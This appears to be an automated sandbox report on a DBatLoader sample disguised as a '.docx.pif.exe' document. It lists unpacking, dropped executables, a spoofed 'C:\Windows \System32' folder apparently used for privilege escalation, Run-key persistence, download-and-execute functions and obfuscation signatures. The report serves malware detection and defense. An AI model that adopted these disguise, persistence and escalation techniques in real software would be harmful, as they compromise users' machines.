Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F5FB2C77-0E2F-4A16-A381-3E560C68BC83}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\colorcpl.exe

Window found: window name: SysTabControl32

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\colorcpl.exe

Window detected: Number of UI elements: 12

Source: C:\Users\Public\xkn.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows \System32\per.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\16.0\Access\Capabilities\UrlAssociations

Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe

Static file information: File size 1085440 > 1048576

Source:	Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdb source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: FodHelper.pdb source: extrac32.exe, 00000012.00000002.1282544160.000001FCCC830000.00000004.00000020.00020000.00000000.sdmp, per.exe, 00000022.00000002.1389829508.00007FF6EF4BB000.00000002.00000001.01000000.00000012.sdmp, per.exe, 00000022.00000000.1363110246.00007FF6EF4BB000.00000002.00000001.01000000.00000012.sdmp, per.exe.18.dr
Source:	Binary string: cmd.pdbUGP source: alpha.exe, 00000008.00000000.1264413808.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000A.00000000.1266008004.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000A.00000002.1267795392.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000C.00000000.1268349543.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000C.00000002.1277417828.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000E.00000000.1277719216.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000E.00000002.1280383467.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000011.00000002.1284778384.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000011.00000000.1280701556.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000015.00000002.1361948594.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000015.00000000.1285093557.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000017.00000000.1301865429.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000017.00000002.1305805578.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000026.00000000.1390985382.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000026.00000002.1397949450.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000002A.00000002.1415158264.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000002A.00000000.1400142537.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe.6.dr
Source:	Binary string: powershell.pdbUGP source: xkn.exe, 00000016.00000000.1285526824.00007FF6C891A000.00000002.00000001.01000000.00000008.sdmp, xkn.exe.15.dr
Source:	Binary string: easinvoker.pdbH source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: reg.pdb source: extrac32.exe, 0000000D.00000002.1276914690.00000178283A0000.00000004.00000020.00020000.00000000.sdmp, ger.exe, 00000018.00000002.1302899439.00007FF7E0A10000.00000002.00000001.01000000.0000000B.sdmp, ger.exe, 00000018.00000000.1302258700.00007FF7E0A10000.00000002.00000001.01000000.0000000B.sdmp, ger.exe.13.dr
Source:	Binary string: powershell.pdb source: xkn.exe, 00000016.00000000.1285526824.00007FF6C891A000.00000002.00000001.01000000.00000008.sdmp, xkn.exe.15.dr
Source:	Binary string: cmd.pdb source: alpha.exe, 00000008.00000000.1264413808.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000A.00000000.1266008004.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000A.00000002.1267795392.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000C.00000000.1268349543.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000C.00000002.1277417828.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000E.00000000.1277719216.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000E.00000002.1280383467.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000011.00000002.1284778384.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000011.00000000.1280701556.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000015.00000002.1361948594.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000015.00000000.1285093557.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000017.00000000.1301865429.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000017.00000002.1305805578.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000026.00000000.1390985382.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000026.00000002.1397949450.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000002A.00000002.1415158264.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000002A.00000000.1400142537.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe.6.dr
Source:	Binary string: FodHelper.pdbGCTL source: extrac32.exe, 00000012.00000002.1282544160.000001FCCC830000.00000004.00000020.00020000.00000000.sdmp, per.exe, 00000022.00000002.1389829508.00007FF6EF4BB000.00000002.00000001.01000000.00000012.sdmp, per.exe, 00000022.00000000.1363110246.00007FF6EF4BB000.00000002.00000001.01000000.00000012.sdmp, per.exe.18.dr
Source:	Binary string: reg.pdbGCTL source: extrac32.exe, 0000000D.00000002.1276914690.00000178283A0000.00000004.00000020.00020000.00000000.sdmp, ger.exe, 00000018.00000002.1302899439.00007FF7E0A10000.00000002.00000001.01000000.0000000B.sdmp, ger.exe, 00000018.00000000.1302258700.00007FF7E0A10000.00000002.00000001.01000000.0000000B.sdmp, ger.exe.13.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\Public\Libraries\drbdmeyP.pif

Unpacked PE file: 3.2.drbdmeyP.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.rsrc:R; vs . :EW;. :EW;. :R;. :W;. :W;. :W;

Detected unpacking (creates a PE file in dynamic memory)

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe

Unpacked PE file: 0.2.#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe.2980000.1.unpack

Yara detected DBatLoader

Source: Yara match	File source: 0.2.#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe.2980000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe.2980000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Binary contains a suspicious time stamp

Source: drbdmeyP.pif.0.dr

Static PE information: 0x9E9038DB [Sun Apr 19 22:51:07 2054 UTC]

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe

Code function: 0_2_02997CC8 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,

0_2_02997CC8

PE file contains sections with non-standard names

Source: alpha.exe.6.dr	Static PE information: section name: .didat
Source: per.exe.18.dr	Static PE information: section name: .imrsiv

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: 0_2_029832FC push eax; ret	0_2_02983338
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: 0_2_029AA2FC push 029AA367h; ret	0_2_029AA35F
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: 0_2_0299D2E4 push ecx; mov dword ptr [esp], edx	0_2_0299D2E9
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: 0_2_0298635A push 029863B7h; ret	0_2_029863AF
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: 0_2_0298635C push 029863B7h; ret	0_2_029863AF
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: 0_2_029AA0AC push 029AA125h; ret	0_2_029AA11D
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: 0_2_029AA1F8 push 029AA288h; ret	0_2_029AA280
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: 0_2_029AA144 push 029AA1ECh; ret	0_2_029AA1E4
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: 0_2_02986748 push 0298678Ah; ret	0_2_02986782
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: 0_2_02986746 push 0298678Ah; ret	0_2_02986782
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: 0_2_0298C4FC push ecx; mov dword ptr [esp], edx	0_2_0298C501
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: 0_2_0298D530 push 0298D55Ch; ret	0_2_0298D554
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: 0_2_0298CB7C push 0298CD02h; ret	0_2_0298CCFA
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: 0_2_0299789C push 02997919h; ret	0_2_02997911
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: 0_2_0298C8AA push 0298CD02h; ret	0_2_0298CCFA
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: 0_2_029968D8 push 02996983h; ret	0_2_0299697B
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: 0_2_029968D6 push 02996983h; ret	0_2_0299697B
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: 0_2_029A9874 push 029A9A60h; ret	0_2_029A9A58
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: 0_2_029ADE98 push eax; ret	0_2_029ADF68
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: 0_2_02999EBB push 02999EF4h; ret	0_2_02999EEC
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: 0_2_02999EBC push 02999EF4h; ret	0_2_02999EEC
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: 0_2_02992EF0 push 02992F66h; ret	0_2_02992F5E
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: 0_2_02995E0C push ecx; mov dword ptr [esp], edx	0_2_02995E0E
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: 0_2_02992FFB push 02993049h; ret	0_2_02993041
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: 0_2_02992FFC push 02993049h; ret	0_2_02993041
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: 0_2_02997F18 push 02997F50h; ret	0_2_02997F48
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: 0_2_02997C7C push 02997CBEh; ret	0_2_02997CB6
Source: C:\Users\Public\Libraries\drbdmeyP.pif	Code function: 3_2_00419935 push edx; iretd	3_2_00419949
Source: C:\Users\Public\Libraries\drbdmeyP.pif	Code function: 3_2_00419A3E push eax; ret	3_2_00419A41
Source: C:\Users\Public\Libraries\drbdmeyP.pif	Code function: 3_2_00414324 push cs; iretd	3_2_004143FA
Source: C:\Users\Public\Libraries\drbdmeyP.pif	Code function: 3_2_00414426 push cs; iretd	3_2_004143FA

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	File created: C:\Users\Public\Libraries\drbdmeyP.pif			Jump to dropped file
Source: C:\Windows\SysWOW64\extrac32.exe	File created: C:\Users\Public\Libraries\Pyemdbrd.PIF			Jump to dropped file

Drops executables to the windows directory (C:\Windows) and starts them

Source: C:\Windows\System32\cmd.exe

Executable created and started: C:\Windows \System32\per.exe

Jump to behavior

Contains functionality to download and launch executables

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 31_2_04586EB0 ShellExecuteW,URLDownloadToFileW,

31_2_04586EB0

Drops PE files

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	File created: C:\Users\Public\Libraries\drbdmeyP.pif	Jump to dropped file
Source: C:\Windows\System32\extrac32.exe	File created: C:\Users\Public\alpha.exe	Jump to dropped file
Source: C:\Windows\System32\extrac32.exe	File created: C:\Users\Public\xkn.exe	Jump to dropped file
Source: C:\Windows\System32\extrac32.exe	File created: C:\Windows \System32\per.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\extrac32.exe	File created: C:\Users\Public\Libraries\Pyemdbrd.PIF	Jump to dropped file
Source: C:\Windows\System32\extrac32.exe	File created: C:\Users\Public\ger.exe	Jump to dropped file

Drops PE files to the user directory

Source: C:\Windows\System32\extrac32.exe	File created: C:\Users\Public\alpha.exe	Jump to dropped file
Source: C:\Windows\System32\extrac32.exe	File created: C:\Users\Public\xkn.exe	Jump to dropped file
Source: C:\Windows\System32\extrac32.exe	File created: C:\Users\Public\ger.exe	Jump to dropped file

Drops PE files to the windows directory (C:\Windows)

Source: C:\Windows\System32\extrac32.exe

File created: C:\Windows \System32\per.exe

Jump to dropped file

Boot Survival

Drops PE files to the user root directory

Source: C:\Windows\System32\extrac32.exe	File created: C:\Users\Public\alpha.exe	Jump to dropped file
Source: C:\Windows\System32\extrac32.exe	File created: C:\Users\Public\xkn.exe	Jump to dropped file
Source: C:\Windows\System32\extrac32.exe	File created: C:\Users\Public\ger.exe	Jump to dropped file

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 31_2_0459AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

31_2_0459AA4A

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Pyemdbrd			Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Pyemdbrd			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Uses an obfuscated file name to hide its real file extension (double extension)

Source: Possible double extension: docx.pif

Static PE information: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe

Code function: 0_2_02999EF8 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_02999EF8

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
